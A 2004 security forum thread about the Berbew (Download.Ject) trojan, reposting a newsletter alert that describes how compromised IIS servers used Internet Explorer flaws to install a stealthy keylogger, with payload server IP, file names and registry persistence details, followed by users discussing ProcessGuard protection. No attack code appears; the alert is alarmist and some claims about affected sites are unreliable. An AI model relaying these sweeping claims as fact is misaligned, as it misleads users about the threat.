Berbew Trojan: Major Security Hole in MS Internet Explorer & Outlook

Discussion in 'ProcessGuard' started by godzillex, Jun 26, 2004.

Thread Status:
Not open for further replies.
  1. godzillex

    godzillex Registered Member

    Joined:
    May 28, 2004
    Posts:
    57
    Folks,

    This one couldn't wait!
    I just hope either the ProcessGuard or TDS can defend against it.
    The following is an excerpt from an e-mail received from "radsoft.net"
    ------------------------------------------------------------------

    A new exploit is out there, and what it's doing is not completely
    original, but the devastating effect is - and let's hope it's unique.

    What it does is infect very well known web sites - mostly Microsoft IIS
    sites, but Yahoo have also been reported to be infected.

    That's stage one. The web server software then waits for connection
    attempts from Windows Internet Explorer clients. Through two faults in
    this Microsoft browser, it then downloads a keystroke logger onto your
    machine without your knowing it. And it cannot be stopped by IDS or
    firewall what they know, because it places its payload in the so-called
    'footer' of the HTML pages your browser requests.

    The payload - unseen by you - is an executable (EXE) that automatically
    installs itself, changes its name, and extracts a DLL as well. When it
    runs, it injects its code into an existing kernel process so even a
    process manager cannot detect it. In short, no one can know they have
    it on their system by using any known system check tools.

    The keystroke logger will of course go for your credit card numbers,
    bank account numbers, online banking passwords - the works.

    The site responsible for this is well-known and duly registered in
    Russia.

    What makes this attack so special is that the people behind it have
    succeeded in infecting the web servers not of out of the way sites but
    of really major companies including but not limited to eBay, Yahoo, and
    many a major bank.

    This is the scenario: you visit your online banking site. That site is
    infected and your computer downloads the keystroke logger in stealth.
    You now log into your bank account - care to guess what happens?

    It's that bad. Worse still, only LURHQ have any handle on what's going
    on. ZD, CNN, and even the Internet Storm Center at SANS admit they know
    next to nothing.

    OK, some headlines so it's easier to see.

    What Web Sites Are Affected
    ---------------------------
    At least Microsoft IIS sites (could be a good idea to use a tool like
    Spike to get HEAD information before visiting) but some are reporting
    Yahoo was also infected - and Yahoo are hardly a Microsoft IIS site.

    What Operating Systems Are Affected
    -----------------------------------
    Only Microsoft Windows. The payload is a file named 'msits.exe' - it's
    a Windows file.

    What Web Browsers Are Affected
    ------------------------------
    Only Microsoft Internet Explorer - AND THERE IS NO PATCH. Also, any
    product using Microsoft Internet Explorer rendering must be considered
    an equal risk - including but not limited to Microsoft Outlook,
    Microsoft Outlook Express, and Eudora [sic].

    What Actions Should I Take And When?
    ------------------------------------
    Act immediately. Do not under any circumstances use Internet Explorer
    again until further notice (and do not trust Microsoft on this one).
    Immediately go and get a different browser - our suggestion is Firefox.

    http://www.mozilla.org

    Do not use any of the above-mentioned email clients. Rather than
    assemble a list of which clients are 'OK' for the time being, and if
    you don't know yourself, use your webmail accounts - BUT NOT WITH
    MICROSOFT INTERNET EXPLORER.

    Further Action I Should Take?
    -----------------------------
    Keep an eye on the security sites. The Internet Storm Center is a good
    bet.

    http://isc.sans.org

    And LURHQ is a very good bet - they are better informed than anyone at
    this stage.

    http://www.lurhq.com

    Further: inform your friends - their welfare is at stake. Do your best
    to see they take this seriously. Remember: this is organised crime gone
    after major bank sites, eBay, Yahoo, and many other well-known
    financial institutions (auction sites too).

    Best of all: stay away for now. Do your banking in person or by phone.
    If these gangs could compromise your bank's web server, just imagine
    what new trick they may have up their sleeve. Be safe rather than sorry.

    In The Long Run
    ---------------
    Microsoft also have some rather lame suggestions posted, but
    conveniently do not address the issue of what is going on and what
    measures they themselves should be taking - and yet their admonition
    that you ONLY RECEIVE PLAIN TEXT EMAIL, albeit long overdue, is very
    very welcome.

    You must therefore make sure yourself your email client and your
    browser (for now) unconditionally observe all of the following:

    1. Email client: must NOT resolve Internet web links.
    2. Email client: must NEVER enable any scripting whatsoever.
    3. Email client: must ABSOLUTELY regard all message content as plain
    text.

    4. Web browser: must NOT be Microsoft Internet Explorer.
    5. Web browser: should NOT allow any scripting (MS recommends this too).

    Links to articles dealing with and explaining this crisis follow.


    ----------------------------------------
    FURTHER READING
    ----------------------------------------
    [ff] Links

    Berbew/Webber/Padodor Trojan Analysis
    http://www.lurhq.com/berbew.html
    The definitive story on the attack.

    'A number of sites are reporting malicious javascript code being
    appended to every page served by their IIS server. Some in the press
    are speculating that there is a new 'zero-day' IIS vulnerability
    circulating.

    'Name: msits.exe, renamed on install
    'Size: 51,712 bytes

    'The trojan is installed via the ADODB/javascript redirection exploit
    for Internet Explorer FOR WHICH THERE IS NO CURRENT PATCH (thanks Bill,
    you two-bit ****). When a user visits an infected IIS server using IE,
    the trojan will be downloaded from a Russian webserver and executed in
    the background. It copies itself to the system directory using a random
    name, and also extracts a DLL file which acts as a loader for the EXE
    at boot time using the ShellServiceObjectDelayLoad Registry key.

    'The trojan appears to be designed for the purposes of 'phishing', that
    is, stealing financial and other account details from the infected
    user. While most phishing is done via email, this trojan directly
    captures password and logins if the infected user attempts to log in to
    Ebay or Paypal and also Earthlink, Juno and Yahoo webmail accounts.

    'The trojan has some rudimentary rootkit functionality; by patching
    in-memory DLLs using the PhysicalMemory device it will not show up in
    the Windows task manager list.'

    [If you didn't get that last bit, get it now: this is serious. Very
    serious. These guys are running rings around Microsoft.]

    Where The Payload Comes From
    http://217.107.218.147:80
    And this is a duly registered, fully legit site in Russia. Needless to
    say, be on the lookout for any traffic with this IP block.

    inetnum: 217.107.218.0 - 217.107.218.255
    netname: E-NEVERLAND-NETWORK-1
    descr: E-Neverland Network Company
    descr: Malaya Dmitrovka st., 12/1
    country: RU

    Researchers warn of infectious Web sites
    http://zdnet.com.com/2100-1105_2-5247187.html
    Security researchers warned Web surfers on Thursday to be on guard
    after uncovering evidence that widespread Web server compromises have
    turned corporate home pages into points of digital infection.

    Increase Your Browsing and E-Mail Safety
    http://www.microsoft.com/security/incident/settings.mspx
    Be careful here: Microsoft are guarding their backsides.

    What You Should Know About Download.Ject
    http://www.microsoft.com/security/incident/download_ject.mspx
    Likewise: note MS don't even use the same name. That's because no
    matter what they attempt to imply, THEY DO NOT HAVE A PATCH.

    Pop-up toolbar spreads via IE flaws
    http://zdnet.com.com/2100-1105_2-5229707.html
    Earlier story on same topic.

    Two Domains To Boycott Completely (DO NOT CLICK)
    i-lookup.com * iclicks.net
    These sites are suspected of being involved in this attack.

    Web hosting company confirms hack attack
    http://zdnet.com.com/2100-1105_2-5076050.html
    Another related story - experts are still trying to put the pieces
    together.

    Berbew Report At The Internet Storm Center
    http://isc.sans.org/
    http://isc.sans.org/diary.php?date=2004-06-24
    For once they don't have all the information, but they're an important
    resource.


    ==============================================================
    Copyright (c) 2004 radsoft.net. All rights reserved.
    Online < http://radsoft.net/news/0 > Subscriber/X-news
    Subscribe/unsubscribe < http://radsoft.net/news/x-news.html >
    ==============================================================
     
  2. Pilli

    Pilli Registered Member

    Joined:
    Feb 13, 2002
    Posts:
    6,217
    Location:
    Hampshire UK
    Hi godzillex, I am pretty sure Process guard will protect you

    This is exactly the kind of exploit that PG was designed to stop.
    No .exe can run without the checksum being accepted by the user.
    .dll injection would then not occurr.

    Regarding TDS3 and other AV - AT I am sure that these will be updated to protect against this threat as soon as possible. I do not know if the latest radius file does include protection against this exploit as yet though TDS3 does protect against many key loggers.

    Here is a little more data about the exploit.

    Click the Start button and then click on Search
    Make sure you choose the option to look through all files and folders
    Search for files called Kk32.dll and Surf.dat
    If infected use up to date anti-virus software to remove the malicious code


    Pilli
     
  3. godzillex

    godzillex Registered Member

    Joined:
    May 28, 2004
    Posts:
    57
    Hi Pilli,

    I also thought the same thing, but was not quite sure. Apparently, what makes this trojan particularly insidious is the way that it patches itself to running processes without showing up in any of the process listing programs. Worse yet, if a user has been working all day (i.e., he is tired and not paying 100% attention to what he should be doing), he may inadvertantely 'allow' the trojan to run!
    I think that TDS should be the primary means of catching this trojan.

    1. Does anyone know if TDS is capable of identifying this trojan yet?
    2. If so, since when?

    Thanks.
    godzillex
     
  4. gkweb

    gkweb Expert Firewall Tester

    Joined:
    Aug 29, 2003
    Posts:
    1,932
    Location:
    FRANCE, Rouen (76)
    Hi,

    even if you allow the executable to run (or that if it's IE itself which is already running which try to inject into something) then Process Guard will simply
    prevent the code injection, with a warning in addition on the log window.

    So I think this exploit is prevented by Process Guard.

    regards,

    gkweb.
     
  5. Peter2150

    Peter2150 Global Moderator

    Joined:
    Sep 20, 2003
    Posts:
    17,041
    I like GKWEB am confident that Process Guard will catch this on several fronts. Another IE plugin that also helps is PopUpCop. While its main function is popup's it will also jump up with alerts if a site tries to do nasty stuff with Active X and/or silently download anything on you.
     
  6. godzillex

    godzillex Registered Member

    Joined:
    May 28, 2004
    Posts:
    57
    Thanks guys.
    Just for your information, the only two items that I had enabled in the Process Guard were the "Program Checksum Protection", and the "Protection Enabled". Nothing else in the "General Protection Options" was enabled!!!
    Would this type of settings have still protected me from the Berbew trojan?
     
  7. Pilli

    Pilli Registered Member

    Joined:
    Feb 13, 2002
    Posts:
    6,217
    Location:
    Hampshire UK
    If the backdoor is loaded:

    Attachment: web.da.us.citi.heloc.pif (5,664 bytes)

    The attachment is Trojan.Download.Berbew. When it is run, it downloads Backdoor.Berbew (39,140 bytes) from the Internet and saves it into the %System% folder as Rtdx32.exe and then runs it.[i/]

    Process Guard's checksum list would alert you that the .exe was trying to load so in that way you could stop this Trojan.

    If you are also runnng Worm Guard this would stop the .pif from running and alert you that it could be dodgy.

    HTH Pilli
     
Thread Status:
Not open for further replies.